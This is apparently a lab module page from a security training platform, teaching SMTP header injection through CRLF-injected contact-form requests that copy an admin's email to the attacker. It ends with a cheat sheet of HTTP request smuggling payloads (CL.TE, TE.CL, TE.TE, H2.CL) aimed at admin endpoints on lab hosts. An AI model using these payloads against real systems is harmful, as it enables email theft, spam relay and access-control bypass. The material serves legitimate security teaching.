HTTP Attacks

SMTP Header Injection

SMTP Header Injection or Email Injection is a vulnerability that allows attackers to inject SMTP headers. The Simple Mail Transfer Protocol (SMTP) is used to send emails. Similar to HTTP, an SMTP message consists of a header section and a body section. SMTP headers are separated by newlines just like HTTP headers. As such, SMTP Header Injection is the injection of headers into an SMTP message.

Web applications often implement email functionality to inform users about certain events. In most cases, user input is reflected in SMTP headers such as the subject or sender. This can lead to CRLF injection attacks if the user input is not sanitized properly.

Introduction to SMTP Headers

As described above, an SMTP email is structured similarly to an HTTP request or response. The message contains a header section consisting of SMTP headers that can have a special meaning, followed by an empty line to denote the start of the message body. Finally, the email content itself is sent in the message body. Let's have a look at a simple example email:

From: [email protected]
To: [email protected]
Cc: [email protected]
Date: Thu, 26 Oct 2006 13:10:50 +0200
Subject: Testmail
  
Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.  
.

The SMTP headers define meta information such as the sender, recipients, and subject. Each header is separated by a CRLF control sequence. After the header section, there is an empty line followed by the request body. Finally, the request body is terminated with a single line that contains nothing but a dot.

Here is a short list of some important SMTP headers and their meaning:

From: contains the sender
To: contains a single recipient or a list of recipients
Subject: contains the email title
Reply-To: contains the email address the recipient should reply to
Cc: contains recipients that receive a carbon copy of the email
Bcc: contains recipients that receive a blind carbon copy of the email

Identification

Let's have a look at an example. The web application in the exercise below implements a simple contact form that sends an email to the admin user:

When submitting the data depicted in the screenshot above, the admin receives the following email:

We can identify that our supplied email address gets reflected in the From header. Furthermore, our message is reflected in the email body. Just like in the previous sections, we can attempt to inject a CRLF sequence in our supplied email address and supply an arbitrary header to confirm that we have an SMTP Header Injection vulnerability. We can do so with the following request:

POST /contact.php HTTP/1.1
Host: smtpinjection.htb
Content-Length: 105
Content-Type: application/x-www-form-urlencoded

name=evilhacker&[email protected]%0d%0aTestheader:%20Testvalue&phone=123456789&message=Hello+Admin%21

Looking behind the scenes, we can confirm that our proof of concept header was indeed injected into the email:

Now that we know that the web application is vulnerable to SMTP Header Injection, let's discuss a few options for exploiting this vulnerability.

Exploitation

In a real-world deployment of a vulnerable web application, we often do not have access to the resulting email, so we cannot confirm whether our header was successfully injected or not. Our first exploitation attempt could be to add ourselves as a recipient of the email. If we receive the email, we know that we successfully injected an SMTP header. We can do this by targeting one of the following SMTP headers: To, Cc, or Bcc. We can inject our own email address into the header to force the SMTP server to send the email to us:

POST /contact.php HTTP/1.1
Host: smtpinjection.htb
Content-Length: 107
Content-Type: application/x-www-form-urlencoded

name=evilhacker&[email protected]%0d%0aCc:%[email protected]&phone=123456789&message=Hello+Admin%21

This should forward the email to our email address at [email protected], including any potentially confidential content. We can also utilize the same methodology to force the SMTP server to send spam emails by supplying a huge list of recipients in any of the three SMTP headers mentioned above and sending the request repeatedly. This would make the SMTP server send a lot of emails to the recipients supplied by us.

In some cases, the application might append additional data to our injection point. Consider a scenario where we supply a name and it is reflected in the Subject header to form the following line: You received a message from <name>!. In this case, an exclamation mark is appended to our input. If we now try to inject a Cc header containing our email address, the web application will append the exclamation mark to our email address and thus invalidate it. It is therefore recommended to always inject an additional dummy header after our actual payload to avoid running into such issues. We can do this by specifying an additional line after our payload:

POST /contact.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 151
Content-Type: application/x-www-form-urlencoded

name=evilhacker&email=evil%40attacker.htb%0d%0aCc:%[email protected]%0d%0aDummyheader:%20abc&phone=123456789&message=Hello+Admin%21

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

vHosts needed for these questions:

mail.smtpinjection.htb

+ 5 Try to use what you learned in this section to steal the sensitive information sent to the admin user in an email. Your email address is [email protected]. The emails can be accessed on the vhost mail.smtpinjection.htb.

+10 Streak pts

Previous Next

Go to Questions

Introduction to HTTP Attacks

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

CRLF Injection

Description	Character	ASCII (Decimal)	ASCII (Hex)	URL Encoded
Carriage Return	`\r`	`13`	`0x0D`	`%0D`
Line Feed	`\n`	`10`	`0x0A`	`%0A`

Request Smuggling

Content-Length

request body length specified in the Content-Length header

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

param1=HelloWorld&param2=Test

Chunked Encoding

Transfer-Encoding header set to chunked to specify chunked encoding
Each chunk contains the chunk length in hex followed by a newline and the chunk data
Request terminated with empty chunk 0

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1d
param1=HelloWorld&param2=Test
0

CL.TE Vulnerability

reverse proxy uses the Content-Length header, web server uses the Transfer-Encoding header

POST / HTTP/1.1
Host: clte.htb
Content-Length: 52
Transfer-Encoding: chunked

0

POST /admin.php?promote_uid=2 HTTP/1.1
Dummy:

TE.CL Vulnerability

reverse proxy uses the Transfer-Encoding header, web server uses the Content-Length header

GET /404 HTTP/1.1
Host: tecl.htb
Content-Length: 4
Transfer-Encoding: chunked

27
GET /admin HTTP/1.1
Host: tecl.htb


0

TE.TE Vulnerability

obfuscate Transfer-Encoding header from one of the systems to provoke a CL.TE or TE.CL vulnerability

Description	Header
Substring match	`Transfer-Encoding: testchunked`
Space in Header name	`Transfer-Encoding : chunked`
Horizontal Tab Separator	`Transfer-Encoding:[\x09]chunked`
Vertical Tab Separator	`Transfer-Encoding:[\x0b]chunked`
Leading space	`Transfer-Encoding: chunked`

HTTP/2 Downgrading

HTTP/2 is a binary protocol
HTTP/2 uses pseudo-headers:
- :method: the HTTP method
- :scheme: the protocol scheme (typically http or https)
- :authority: similar to the HTTP Host header
- :path: the requested path including the query string
HTTP/2 downgrading occurs when the reverse proxy rewrites an HTTP/2 request from the client to an HTTP/1.1 request which is forwarded to the web server

H2.CL vulnerability

Injection of a Content-Length header which is used by the web server after the request was rewritten by the reverse proxy

POST /index.php HTTP/2
Host: http2.htb
Content-Length: 0

POST /index.php?reveal_flag=1 HTTP/1.1
Foo: